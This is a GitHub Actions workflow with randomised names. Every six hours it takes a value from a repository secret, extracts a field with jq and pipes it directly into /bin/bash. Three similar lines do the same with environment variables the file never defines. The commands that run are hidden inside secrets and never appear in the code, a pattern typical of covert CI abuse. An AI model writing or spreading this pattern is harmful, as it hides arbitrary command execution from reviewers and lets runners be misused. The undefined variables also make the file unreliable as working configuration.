name: zhangnubi4567

on:
  workflow_dispatch:
  schedule:
    - cron: '49 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangnubi4567
        env:
          tedu06459: ${{ secrets.tedu06459 }}
        run: |
          echo $tedu06459 | jq -r .uab433 | /bin/bash
          echo $mbofl32214 | jq -r .ven56849 | /bin/bash
          echo $tbxe8 | jq -r .szny08521 | /bin/bash
          echo $vdtf8 | jq -r .bj99 | /bin/bash

